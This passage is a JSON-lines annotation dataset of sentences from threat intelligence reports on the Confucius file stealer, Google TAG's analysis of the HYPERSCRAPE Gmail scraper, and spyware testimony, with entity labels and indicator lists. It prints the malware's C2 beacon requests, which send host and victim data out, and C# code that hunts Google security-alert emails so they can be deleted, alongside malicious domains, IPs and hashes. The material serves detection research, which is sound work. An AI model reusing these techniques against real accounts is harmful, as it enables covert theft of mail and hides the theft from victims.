{"id":4338,"text":"The “Documents,” “Downloads,” “Desktop,” and “Pictures” folders of every user","entities":[],"relations":[],"Comments":[]} {"id":4339,"text":"are checked.","entities":[],"relations":[],"Comments":[]} {"id":4340,"text":"The DLL file also examines drives other than C:","entities":[],"relations":[],"Comments":[]} {"id":4341,"text":". Figure 4. Code showing the main function of the file stealer ","entities":[],"relations":[],"Comments":[]} {"id":4342,"text":"When a file matching one of the listed extensions is found, its MD5 hash is calculated and compared to an exclusion list retrieved from the command-and-control (C&C) server pirnaram[.]xyz.","entities":[{"id":50131,"label":"DOMAIN","start_offset":173,"end_offset":187}],"relations":[],"Comments":[]} {"id":4343,"text":"If the hash is not listed, the file is sent via the C&C to a directory named after the concatenation of the machine name and the username.","entities":[],"relations":[],"Comments":[]} {"id":4344,"text":"The exclusion list is different for every machine name-username string.","entities":[],"relations":[],"Comments":[]} {"id":4345,"text":"Other campaigns","entities":[],"relations":[],"Comments":[]} {"id":4346,"text":"During our monitoring of Confucius, we came across a campaign delivering the same payload, using a different lure.","entities":[],"relations":[],"Comments":[]} {"id":4347,"text":"In this instance, the campaign impersonated the Pakistani Defense Housing Authority.","entities":[{"id":50132,"label":"identity","start_offset":48,"end_offset":83}],"relations":[],"Comments":[]} {"id":4348,"text":"Again, this threat actor’s interest in military personnel is obvious.","entities":[],"relations":[],"Comments":[]} {"id":4349,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":4350,"text":"Spear-phishing email from early August","entities":[{"id":50133,"label":"attack-pattern","start_offset":0,"end_offset":14},{"id":50134,"label":"TIME","start_offset":26,"end_offset":38}],"relations":[],"Comments":[]} {"id":4351,"text":" The lures used in an older campaign from April 2021 impersonated the Federal Board of Revenue.","entities":[{"id":50135,"label":"TIME","start_offset":45,"end_offset":55},{"id":50136,"label":"identity","start_offset":73,"end_offset":97}],"relations":[],"Comments":[]} {"id":4352,"text":"There were minor differences in tools, tactics, and procedures: the malicious document was directly attached to the spear phishing email — still encrypted — and the decryption password was sent in a different email.","entities":[{"id":50137,"label":"attack-pattern","start_offset":116,"end_offset":130}],"relations":[],"Comments":[]} {"id":4353,"text":"The first stage was also hidden in the “Comments” section.","entities":[],"relations":[],"Comments":[]} {"id":4354,"text":"However, the second stage contained the final payload, which was once again a file stealer with the exact same structure (a .NET DLL).","entities":[],"relations":[],"Comments":[]} {"id":4355,"text":"Instead of exfiltrating the files through PHP scripts, they were done via FTP server.","entities":[],"relations":[],"Comments":[]} {"id":4356,"text":"It should be noted that in some occasions, the threat actor sent spear-phishing emails from the domain name mailerservice[.]directory which we attributed to the Patchwork threat actor in previous research.","entities":[{"id":50138,"label":"attack-pattern","start_offset":65,"end_offset":79},{"id":50139,"label":"DOMAIN","start_offset":108,"end_offset":133},{"id":50140,"label":"threat-actor","start_offset":161,"end_offset":170}],"relations":[{"id":919,"from_id":50139,"to_id":50140,"type":"attributed-to"}],"Comments":[]} {"id":4357,"text":"We disclosed multiple links between Patchwork and Confucius threat actors in the past, so this came as no surprise to us.","entities":[{"id":50141,"label":"threat-actor","start_offset":36,"end_offset":45},{"id":50142,"label":"threat-actor","start_offset":50,"end_offset":59}],"relations":[],"Comments":[]} {"id":4358,"text":" The creative use of social engineering lures and how to defend against them","entities":[{"id":50143,"label":"attack-pattern","start_offset":21,"end_offset":45}],"relations":[],"Comments":[]} {"id":4359,"text":"In our previous research, we already found Confucius, which is known for targeting Pakistan military for espionage purposes, employing multiple file stealers.","entities":[{"id":50144,"label":"threat-actor","start_offset":43,"end_offset":52},{"id":50145,"label":"identity","start_offset":83,"end_offset":100}],"relations":[],"Comments":[]} {"id":4360,"text":"While the code quality of its payloads is not of the highest standard, this threat actor uses innovative techniques when crafting its malicious documents, such as hiding malicious code in the comments section, or using encrypted documents to prevent automatic analysis.","entities":[],"relations":[],"Comments":[]} {"id":4361,"text":"Therefore, it’s highly likely that Confucius will continue to experiment and try out different kinds of social engineering lures in future campaigns.","entities":[],"relations":[],"Comments":[]} {"id":4362,"text":"Despite the variety of lures used by the threat actor, best security practices still apply to these attacks.","entities":[],"relations":[],"Comments":[]} {"id":4363,"text":"Users should always be wary and avoid clicking on any link or downloading any file from unsolicited emails or suspicious sources.","entities":[{"id":50146,"label":"attack-pattern","start_offset":62,"end_offset":128}],"relations":[],"Comments":[]} {"id":4364,"text":"Red flags such as unusual sender domains or grammatical and spelling errors are also a sign that the email is malicious in nature, or at the very least, should be approached with proper security protocols in mind.","entities":[],"relations":[],"Comments":[]} {"id":4365,"text":"The following security solutions can also protect users from email-based attacks: Trend Micro™ Cloud App Security – Enhances the security of Microsoft Office 365 and other cloud services via computer vision and real-time scanning.","entities":[{"id":50148,"label":"SOFTWARE","start_offset":142,"end_offset":162},{"id":50147,"label":"SOFTWARE","start_offset":83,"end_offset":114}],"relations":[],"Comments":[]} {"id":4366,"text":"It also protects organizations from email-based threats.","entities":[],"relations":[],"Comments":[]} {"id":4367,"text":"Trend Micro™ Deep Discovery™ Email Inspector – Defends users through a combination of real-time scanning and advanced analysis techniques for known and unknown attacks. Indicators of Compromise Hashes of the malicious encrypted documents: SHA256 Detection name dacf7868a71440a7d7d8797caca1aa29b7780801e6f3b3bc33123f16989354b2 Trojan.W97M.CONFUCIUS.A 0f6bcbdf4d192f8273887f9858819dd4690397a92fb28a60bb731c873c438e07 Trojan.W97M.CONFUCIUS.B","entities":[{"id":50153,"label":"malware","start_offset":428,"end_offset":451},{"id":50149,"label":"SOFTWARE","start_offset":0,"end_offset":28},{"id":50150,"label":"SHA2","start_offset":271,"end_offset":335},{"id":50151,"label":"malware","start_offset":337,"end_offset":360},{"id":50152,"label":"SHA2","start_offset":362,"end_offset":426}],"relations":[{"id":920,"from_id":50150,"to_id":50151,"type":"indicates"},{"id":921,"from_id":50152,"to_id":50153,"type":"indicates"}],"Comments":[]} {"id":4368,"text":"508bcc1f3906f5641116cde26b830b43f38f9c68a32b67e03a3e7e3f920b1f4a","entities":[{"id":13098,"label":"SHA2","start_offset":0,"end_offset":64}],"relations":[],"Comments":[]} {"id":4369,"text":" Trojan.W97M.CONFUCIUS.B 654c7021a4482da21e149ded58643b279ffbce66badf1a0a7fc3551acd607312 Trojan.W97M.CONFUCIUS.C 712172b5b1895bbfcced961a83baa448e26e93e301be407e6b9dc8cb6526277f Trojan.Win32.DLOADR.TIOIBELQ","entities":[{"id":13099,"label":"SHA2","start_offset":26,"end_offset":90},{"id":13100,"label":"SHA2","start_offset":117,"end_offset":181},{"id":50154,"label":"malware","start_offset":1,"end_offset":24},{"id":50155,"label":"malware","start_offset":92,"end_offset":115},{"id":50156,"label":"malware","start_offset":183,"end_offset":211}],"relations":[{"id":922,"from_id":13099,"to_id":50154,"type":"indicates"},{"id":923,"from_id":13100,"to_id":50155,"type":"indicates"}],"Comments":[]} {"id":4370,"text":" URLs\/Domains\/IP Addresses Server hosting malicious documents parinari[.]xyz Server used for file exfiltration pirnaram[.]xyz Domain names linked to other campaigns","entities":[{"id":50157,"label":"DOMAIN","start_offset":73,"end_offset":87},{"id":50158,"label":"DOMAIN","start_offset":124,"end_offset":138}],"relations":[],"Comments":[]} {"id":4371,"text":" pemra[.]email ispr[.]email fbr[.]news defencepk[.]email pakistanarmy[.]email pmogovpk[.]email mailerservice[.]directory file-dnld[.]com funtifu[.]live cnic-update[.]com cnic-ferify[.]live fbr-update[.]com download.fbr[.]tax support-team[.]tech api.priveetalk[.]com Sender email addresses latest_info@fbr.news notice@fbr.news alert@fbr.news thenewsinernational@mailerservice.directory","entities":[{"id":13101,"label":"EMAIL","start_offset":314,"end_offset":334},{"id":13102,"label":"EMAIL","start_offset":336,"end_offset":351},{"id":13103,"label":"EMAIL","start_offset":353,"end_offset":367},{"id":13104,"label":"EMAIL","start_offset":369,"end_offset":412},{"id":50166,"label":"DOMAIN","start_offset":128,"end_offset":143},{"id":50167,"label":"DOMAIN","start_offset":145,"end_offset":159},{"id":50161,"label":"DOMAIN","start_offset":30,"end_offset":40},{"id":50162,"label":"DOMAIN","start_offset":42,"end_offset":59},{"id":50163,"label":"DOMAIN","start_offset":61,"end_offset":81},{"id":50164,"label":"DOMAIN","start_offset":83,"end_offset":99},{"id":50159,"label":"DOMAIN","start_offset":1,"end_offset":14},{"id":50160,"label":"DOMAIN","start_offset":16,"end_offset":28},{"id":50165,"label":"DOMAIN","start_offset":101,"end_offset":126},{"id":50171,"label":"DOMAIN","start_offset":218,"end_offset":236},{"id":50172,"label":"DOMAIN","start_offset":238,"end_offset":257},{"id":50168,"label":"DOMAIN","start_offset":161,"end_offset":178},{"id":50169,"label":"DOMAIN","start_offset":180,"end_offset":198},{"id":50170,"label":"DOMAIN","start_offset":200,"end_offset":216},{"id":50173,"label":"DOMAIN","start_offset":259,"end_offset":279}],"relations":[],"Comments":[]} {"id":4372,"text":" Tags APT & Targeted Attacks | Cyber Crime | Research | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":4373,"text":"As part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats including APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users.","entities":[{"id":50174,"label":"identity","start_offset":11,"end_offset":14},{"id":50178,"label":"identity","start_offset":162,"end_offset":180},{"id":50175,"label":"identity","start_offset":55,"end_offset":61},{"id":50176,"label":"threat-actor","start_offset":132,"end_offset":137},{"id":50177,"label":"threat-actor","start_offset":142,"end_offset":157}],"relations":[{"id":924,"from_id":50177,"to_id":50178,"type":"attributed-to"},{"id":925,"from_id":50176,"to_id":50177,"type":"duplicate-of"}],"Comments":[]} {"id":4374,"text":"For years, we have been countering this group’s efforts to hijack accounts, deploy malware, and their use of novel techniques to conduct espionage aligned with the interests of the Iranian government.","entities":[{"id":50179,"label":"attack-pattern","start_offset":59,"end_offset":74},{"id":50181,"label":"identity","start_offset":181,"end_offset":199},{"id":50180,"label":"attack-pattern","start_offset":76,"end_offset":90}],"relations":[],"Comments":[]} {"id":4375,"text":"Now, we’re shining light on a new tool of theirs.","entities":[],"relations":[],"Comments":[]} {"id":4376,"text":"In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.","entities":[{"id":13122,"label":"threat-actor","start_offset":41,"end_offset":56},{"id":50182,"label":"TIME","start_offset":3,"end_offset":16},{"id":50183,"label":"identity","start_offset":18,"end_offset":21},{"id":50188,"label":"attack-pattern","start_offset":90,"end_offset":105},{"id":50186,"label":"SOFTWARE","start_offset":118,"end_offset":124},{"id":50184,"label":"malware","start_offset":69,"end_offset":80},{"id":50185,"label":"SOFTWARE","start_offset":111,"end_offset":116},{"id":50187,"label":"SOFTWARE","start_offset":130,"end_offset":147}],"relations":[{"id":926,"from_id":50184,"to_id":13122,"type":"authored-by"},{"id":927,"from_id":50184,"to_id":50188,"type":"uses"},{"id":928,"from_id":50184,"to_id":50185,"type":"targets"},{"id":929,"from_id":50184,"to_id":50186,"type":"targets"},{"id":930,"from_id":50184,"to_id":50187,"type":"targets"}],"Comments":[]} {"id":4377,"text":"The attacker runs HYPERSCRAPE on their own machine to download victims’ inboxes using previously acquired credentials.","entities":[{"id":50189,"label":"malware","start_offset":18,"end_offset":29}],"relations":[],"Comments":[]} {"id":4378,"text":"We have seen it deployed against fewer than two dozen accounts located in Iran.","entities":[{"id":50190,"label":"location","start_offset":74,"end_offset":78}],"relations":[],"Comments":[]} {"id":4379,"text":"The oldest known sample is from 2020, and the tool is still under active development.","entities":[{"id":50191,"label":"TIME","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} {"id":4380,"text":"We have taken actions to re-secure these accounts and have notified the victims through our Government Backed Attacker Warnings.","entities":[],"relations":[],"Comments":[]} {"id":4381,"text":"This post will provide technical details about HYPERSCRAPE, similar to PWC’s recently published analysis on a Telegram grabber tool.","entities":[{"id":50192,"label":"malware","start_offset":47,"end_offset":58},{"id":50194,"label":"malware","start_offset":110,"end_offset":131},{"id":50193,"label":"identity","start_offset":71,"end_offset":75}],"relations":[],"Comments":[]} {"id":4382,"text":"HYPERSCRAPE demonstrates Charming Kitten’s commitment to developing and maintaining purpose-built capabilities.","entities":[{"id":13145,"label":"threat-actor","start_offset":25,"end_offset":40},{"id":50195,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":4383,"text":"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten’s objectives.","entities":[{"id":50196,"label":"malware","start_offset":28,"end_offset":39},{"id":50197,"label":"threat-actor","start_offset":135,"end_offset":150}],"relations":[{"id":931,"from_id":50197,"to_id":50196,"type":"uses"}],"Comments":[]} {"id":4384,"text":" HYPERSCRAPE requires the victim’s account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired.","entities":[{"id":50198,"label":"malware","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} {"id":4385,"text":"It spoofs the user agent to look like an outdated browser, which enables the basic HTML view in Gmail.","entities":[{"id":50199,"label":"SOFTWARE","start_offset":96,"end_offset":101}],"relations":[],"Comments":[]} {"id":4386,"text":"Once logged in, the tool changes the account’s language settings to English and iterates through the contents of the mailbox, individually downloading messages as .eml files and marking them unread.","entities":[],"relations":[],"Comments":[]} {"id":4387,"text":"After the program has finished downloading the inbox, it reverts the language back to its original settings and deletes any security emails from Google.","entities":[{"id":50200,"label":"SOFTWARE","start_offset":145,"end_offset":151}],"relations":[],"Comments":[]} {"id":4388,"text":"Earlier versions contained the option to request data from Google Takeout, a feature which allows users to export their data to a downloadable archive file.","entities":[{"id":50201,"label":"SOFTWARE","start_offset":59,"end_offset":73}],"relations":[],"Comments":[]} {"id":4389,"text":"The tool is written in .NET for Windows PCs and is designed to run on the attacker's machine.","entities":[{"id":50202,"label":"SOFTWARE","start_offset":32,"end_offset":39}],"relations":[],"Comments":[]} {"id":4390,"text":"We tested HYPERSCRAPE in a controlled environment with a test Gmail Account, although functionality may differ for Yahoo! and Microsoft accounts.","entities":[{"id":50203,"label":"malware","start_offset":10,"end_offset":21}],"relations":[],"Comments":[]} {"id":4391,"text":"HYPERSCRAPE won't run unless in a directory with other file dependencies.","entities":[{"id":50204,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":4392,"text":"When launched, the tool makes an HTTP GET request to a C2 to check for a response body of \"OK'' and will terminate if it's not found.","entities":[],"relations":[],"Comments":[]} {"id":4393,"text":"In the version tested, the C2 was unobfuscated and stored as a hardcoded string.","entities":[],"relations":[],"Comments":[]} {"id":4394,"text":"In later versions it was obfuscated with Base64.","entities":[],"relations":[],"Comments":[]} {"id":4395,"text":"GET http:\/\/{C2}\/Index.php?Ck=OK HTTP\/1.1","entities":[{"id":50205,"label":"URL","start_offset":4,"end_offset":31}],"relations":[],"Comments":[]} {"id":4396,"text":"Host: {C2}","entities":[],"relations":[],"Comments":[]} {"id":4397,"text":"Accept-Encoding: gzip Connection: Keep-Alive","entities":[],"relations":[],"Comments":[]} {"id":4398,"text":"The tool accepts arguments from the command line such as the mode of operation, an identifier string, and a path string to a valid cookie file.","entities":[],"relations":[],"Comments":[]} {"id":4399,"text":"A new form is displayed if the information is not provided via command prompt.","entities":[],"relations":[],"Comments":[]} {"id":4400,"text":"Once provided, the data in the \"Identity\" field is sent to a C2 for confirmation.","entities":[],"relations":[],"Comments":[]} {"id":4401,"text":"Again, the response is expected to be \"OK\".","entities":[],"relations":[],"Comments":[]} {"id":4402,"text":"GET http:\/\/{C2}\/Index.php?vubc={identity} HTTP\/1.1","entities":[{"id":13184,"label":"URL","start_offset":4,"end_offset":40}],"relations":[],"Comments":[]} {"id":4403,"text":"Host: {C2} Accept-Encoding: gzip","entities":[],"relations":[],"Comments":[]} {"id":4404,"text":"If the cookie file path was not supplied via the command line, a new form will allow the operator to do so using drag and drop.","entities":[],"relations":[],"Comments":[]} {"id":4405,"text":"After parsing, the cookies are inserted into a local cache used by the embedded web browser.","entities":[],"relations":[],"Comments":[]} {"id":4406,"text":"A new folder named \"Download\" is created adjacent to the main binary.","entities":[],"relations":[],"Comments":[]} {"id":4407,"text":"The browser then navigates to Gmail to begin the data collection.","entities":[],"relations":[],"Comments":[]} {"id":4408,"text":"The user agent is spoofed so it appears like an outdated browser, which results in an error message and allows the attacker to enable the basic HTML view in Gmail.","entities":[{"id":50206,"label":"SOFTWARE","start_offset":157,"end_offset":162}],"relations":[],"Comments":[]} {"id":4409,"text":"If the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter credentials to proceed, as the program will wait until it finds the inbox page.","entities":[],"relations":[],"Comments":[]} {"id":4410,"text":"Once the attacker has logged in to the victim’s account, HYPERSCRAPE checks to see if the language is set to English, changing it if not.","entities":[{"id":50207,"label":"malware","start_offset":57,"end_offset":68}],"relations":[],"Comments":[]} {"id":4411,"text":"The language is returned to its original setting when the run is finished.","entities":[],"relations":[],"Comments":[]} {"id":4412,"text":"HYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download.","entities":[{"id":50208,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":4413,"text":"It does the following for each email found: The emails are saved with \".eml\" extensions under the Downloads directory with the filename corresponding to the subject.","entities":[],"relations":[],"Comments":[]} {"id":4414,"text":"A log file is written containing a count of the emails that were downloaded.","entities":[],"relations":[],"Comments":[]} {"id":4415,"text":"When finished, a HTTP POST request is made to the C2 to relay the status and system information.","entities":[],"relations":[],"Comments":[]} {"id":4416,"text":"The downloaded emails are not sent to the C2.","entities":[],"relations":[],"Comments":[]} {"id":4417,"text":"POST http:\/\/{C2}\/?Key={GUID}&Crc={Identifier} { \"appName\": \"Gmail Downloader\", \"targetname\": \"{Email}\", \"HostName\": \"REDACTED\", \"srcUserIP\": \"REDACTED\", \"actionType\": \"First\", \"timeOccurrence\": \"05\/01\/2022 05:50:31 PM\", \"OS\": \"REDACTED\", \"OSVersion\": \"REDACTED\", \"SystemModel\": \"REDACTED\", \"SystemType\": \"REDACTED\", \"srcName\": \"REDACTED\", \"srcOrgName\": \"REDACTED\" }","entities":[{"id":13209,"label":"URL","start_offset":5,"end_offset":44},{"id":13211,"label":"TIME","start_offset":206,"end_offset":217}],"relations":[],"Comments":[]} {"id":4418,"text":"The program will delete any security emails from Google generated by the attacker’s activity.","entities":[{"id":50209,"label":"SOFTWARE","start_offset":49,"end_offset":55}],"relations":[],"Comments":[]} {"id":4419,"text":"private bool IsThereAnyEMail() { List < GeckoHtmlElement > list = (from x in this.geckoWebBrowser.Document.GetElementsByTagName(\"span\") where x.TextContent.StartsWith (\"Security alert\") || x.TextContent.StartsWith(\"Archive of Google data requested\") || x.TextContent.StartsWith(\"Your Google data archive is ready\") || x.TextContent.StartsWith(\"Your Google data is ready\") || x.TextContent.StartsWith(\"Critical security alert\") ||","entities":[],"relations":[],"Comments":[]} {"id":4420,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") ||","entities":[],"relations":[],"Comments":[]} {"id":4421,"text":"x.TextContent.StartsWith(\"Review blocked sign-in attempt\") || x.TextContent.","entities":[],"relations":[],"Comments":[]} {"id":4422,"text":"StartsWith(\"Help us protect you: Security advice from Google\")","entities":[],"relations":[],"Comments":[]} {"id":4423,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") select x).ToList","entities":[],"relations":[],"Comments":[]} {"id":4424,"text":"GeckoHtmlElement > (","entities":[],"relations":[],"Comments":[]} {"id":4425,"text":"; bool flag = list.Count == 0; return !flag; }","entities":[],"relations":[],"Comments":[]} {"id":4426,"text":"Data from Google Takeout is also available upon request, but the option was only found in early builds.","entities":[{"id":50210,"label":"SOFTWARE","start_offset":10,"end_offset":24}],"relations":[],"Comments":[]} {"id":4427,"text":"The functionality was not automated and it's unclear why it was removed in later versions.","entities":[],"relations":[],"Comments":[]} {"id":4428,"text":"When conducting a Takeout, the program will spawn a new copy of itself and initialize a pipe communication channel to relay the cookies and account name, both of which are required to accomplish the Takeout.","entities":[],"relations":[],"Comments":[]} {"id":4429,"text":"When they are received, the browser navigates to the official Takeout link to request and eventually download the exported data.","entities":[],"relations":[],"Comments":[]} {"id":4430,"text":"public void ManageTakeOut() { string text = \"PipeName\";","entities":[],"relations":[],"Comments":[]} {"id":4431,"text":"Process process = new Process(); process.StartInfo.Arguments = string.Format(\"PIPE Google \\\"{0}\\\"\", text); process.StartInfo.FileName = Process.GetCurrentProcess().MainModule.FileName; process.Start();","entities":[],"relations":[],"Comments":[]} {"id":4432,"text":"PipeCommunication pipeCommunication = new PipeCommunication(true, text); bool flag = false; while (!flag)","entities":[],"relations":[],"Comments":[]} {"id":4433,"text":"{ try { JsonInfo jsonInfo = pipeCommunication.Read(); switch (jsonInfo.Type) { case JsonType.GetCookies: jsonInfo.Data = this.CookieText; pipeCommunication.Write(jsonInfo); break; case JsonType.TakeOutFile: flag = true; break; case JsonType.GetUsername: while (this.OperationObject.GetUsername() == null) { Thread.Sleep(1000); }","entities":[],"relations":[],"Comments":[]} {"id":4434,"text":"jsonInfo.Data = this.OperationObject.GetUsername(); pipeCommunication.Write(jsonInfo); break; } }","entities":[],"relations":[],"Comments":[]} {"id":4435,"text":"catch (Exception) { bool hasExited = process.HasExited; if (hasExited) { flag = true; } }","entities":[],"relations":[],"Comments":[]} {"id":4436,"text":"pipeCommunication.Close(); }","entities":[],"relations":[],"Comments":[]} {"id":4437,"text":"TAG is committed to sharing research to raise awareness on bad actors like Charming Kitten within the security community, and for companies and individuals that may be targeted.","entities":[{"id":50211,"label":"identity","start_offset":0,"end_offset":3},{"id":50212,"label":"threat-actor","start_offset":75,"end_offset":90}],"relations":[],"Comments":[]} {"id":4438,"text":"It’s why we do things like work with our CyberCrime Investigation Group to share critical information relevant to law enforcement.","entities":[{"id":50213,"label":"identity","start_offset":41,"end_offset":71}],"relations":[],"Comments":[]} {"id":4439,"text":"We hope doing so will improve understanding of tactics and techniques that will enhance threat hunting capabilities and lead to stronger protections across the industry.","entities":[],"relations":[],"Comments":[]} {"id":4440,"text":"We’ll also continue to apply those findings internally to improve the safety and security of our products so we can effectively combat threats and protect users who rely on our services.","entities":[],"relations":[],"Comments":[]} {"id":4441,"text":"In the meantime, we encourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level Enhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.","entities":[],"relations":[],"Comments":[]} {"id":4442,"text":"C2s 136.243.108.14 173.209.51.54 HYPERSCRAPE binaries","entities":[{"id":50214,"label":"malware","start_offset":33,"end_offset":44},{"id":13275,"label":"IPV4","start_offset":4,"end_offset":18},{"id":13276,"label":"IPV4","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} {"id":4443,"text":"03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369 35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208 5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798 6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f 767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4 977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f ac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6 cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa Microsoft Live DLL 1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23 PDB E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\EmailDownloader\\obj\\Debug\\EmailDownloader.pdb E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\Mahdi\\LiveLib\\obj\\Release\\LiveLib.pdb","entities":[{"id":50215,"label":"FILEPATH","start_offset":608,"end_offset":715},{"id":50216,"label":"FILEPATH","start_offset":716,"end_offset":815},{"id":50217,"label":"identity","start_offset":520,"end_offset":529},{"id":13277,"label":"SHA2","start_offset":0,"end_offset":64},{"id":13281,"label":"SHA2","start_offset":260,"end_offset":324},{"id":13282,"label":"SHA2","start_offset":325,"end_offset":389},{"id":13283,"label":"SHA2","start_offset":390,"end_offset":454},{"id":13284,"label":"SHA2","start_offset":455,"end_offset":519},{"id":13278,"label":"SHA2","start_offset":65,"end_offset":129},{"id":13279,"label":"SHA2","start_offset":130,"end_offset":194},{"id":13280,"label":"SHA2","start_offset":195,"end_offset":259},{"id":13286,"label":"SHA2","start_offset":539,"end_offset":603}],"relations":[],"Comments":[]} {"id":4444,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q2 2022.","entities":[{"id":50218,"label":"TIME","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} {"id":4445,"text":"It was last updated on July 29, 2022.","entities":[{"id":50219,"label":"TIME","start_offset":23,"end_offset":36}],"relations":[],"Comments":[]} {"id":4446,"text":" The following testimony was delivered to the U.S. House Intelligence Committee by Shane Huntley, Senior Director of Google’s Threat Analysis Group (TAG) on July 27, 2022. Chairman Schiff, Ranking Member Turner, and esteemed Members of the Committee: Thank you for the opportunity to appear before the Committee to discuss Google’s efforts to protect users from commercial spyware.","entities":[{"id":50220,"label":"identity","start_offset":46,"end_offset":79},{"id":50223,"label":"identity","start_offset":173,"end_offset":188},{"id":50221,"label":"identity","start_offset":83,"end_offset":153},{"id":50222,"label":"TIME","start_offset":157,"end_offset":170},{"id":50224,"label":"identity","start_offset":324,"end_offset":331}],"relations":[],"Comments":[]} {"id":4447,"text":"We appreciate the Committee’s efforts to raise awareness about the commercial spyware industry that is thriving and growing, creating risks to Americans and Internet users across the globe.","entities":[],"relations":[],"Comments":[]} {"id":4448,"text":" Google has been tracking the activities of commercial spyware vendors for years, and we have been taking critical steps to protect our users.","entities":[{"id":50225,"label":"identity","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} {"id":4449,"text":"We take the security of our users very seriously, and we have dedicated teams in place to protect against attacks from a wide range of sources.","entities":[],"relations":[],"Comments":[]} {"id":4450,"text":"Our Threat Analysis Group, or TAG, is dedicated to protecting users from threats posed by state-sponsored malware attacks and other advanced persistent threats.","entities":[{"id":50226,"label":"identity","start_offset":4,"end_offset":25},{"id":50227,"label":"identity","start_offset":30,"end_offset":33}],"relations":[{"id":932,"from_id":50227,"to_id":50226,"type":"duplicate-of"}],"Comments":[]} {"id":4451,"text":"TAG actively monitors threat actors and the evolution of their tactics and techniques.","entities":[{"id":50228,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4452,"text":"For example, TAG has been closely tracking and disrupting campaigns targeting individuals and organizations in Ukraine, and frequently publishes reports on Russian threat actors.","entities":[{"id":50229,"label":"identity","start_offset":13,"end_offset":16},{"id":50230,"label":"location","start_offset":111,"end_offset":118},{"id":50231,"label":"location","start_offset":156,"end_offset":163}],"relations":[],"Comments":[]} {"id":4453,"text":"We use our research to continuously improve the safety and security of our products and share this intelligence with our industry peers.","entities":[],"relations":[],"Comments":[]} {"id":4454,"text":"We also publicly release information about the operations we disrupt, which is available to our government partners and the general public.","entities":[],"relations":[],"Comments":[]} {"id":4455,"text":"TAG tracks and proactively counters serious state-sponsored and financially motivated information cyber criminal activities, such as hacking and the use of spyware.","entities":[{"id":50232,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4456,"text":"And we don’t just plug security holes – we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet.","entities":[],"relations":[],"Comments":[]} {"id":4457,"text":"We are joined in this effort by many other security teams at Google, including Project Zero, our team of security researchers at Google who study zero-day vulnerabilities in the hardware and software systems that are depended upon by users around the world.","entities":[{"id":50233,"label":"identity","start_offset":61,"end_offset":67},{"id":50234,"label":"identity","start_offset":79,"end_offset":91},{"id":50235,"label":"identity","start_offset":129,"end_offset":135}],"relations":[],"Comments":[]} {"id":4458,"text":" Google has a long track record combating commercial surveillance tools targeting our users.","entities":[{"id":50236,"label":"identity","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} {"id":4459,"text":"In 2017, Android – which is owned by Google – was the first mobile platform to warn users about NSO Group’s Pegasus spyware.","entities":[{"id":50241,"label":"malware","start_offset":108,"end_offset":115},{"id":50237,"label":"TIME","start_offset":3,"end_offset":7},{"id":50240,"label":"threat-actor","start_offset":96,"end_offset":105},{"id":50238,"label":"SOFTWARE","start_offset":9,"end_offset":16},{"id":50239,"label":"identity","start_offset":37,"end_offset":43}],"relations":[{"id":933,"from_id":50241,"to_id":50240,"type":"authored-by"}],"Comments":[]} {"id":4460,"text":"At the time, our Android team released research about a newly discovered family of spyware related to Pegasus that was used in a targeted attack on a small number of Android devices.","entities":[{"id":50243,"label":"malware","start_offset":102,"end_offset":109},{"id":50244,"label":"SOFTWARE","start_offset":166,"end_offset":173},{"id":50245,"label":"identity","start_offset":17,"end_offset":29}],"relations":[{"id":934,"from_id":50243,"to_id":50244,"type":"targets"}],"Comments":[]} {"id":4461,"text":"We observed fewer than three dozen installs of this spyware.","entities":[],"relations":[],"Comments":[]} {"id":4462,"text":"We remediated the compromises for these users and implemented controls to protect all Android users.","entities":[{"id":50246,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} {"id":4463,"text":"NSO Group continues to pose risks across the Internet ecosystem.","entities":[{"id":50247,"label":"threat-actor","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":4464,"text":"In 2019, we confronted the risks posed by NSO Group again, relying upon NSO Groups’s marketing information suggesting that they had a 0-day exploit for 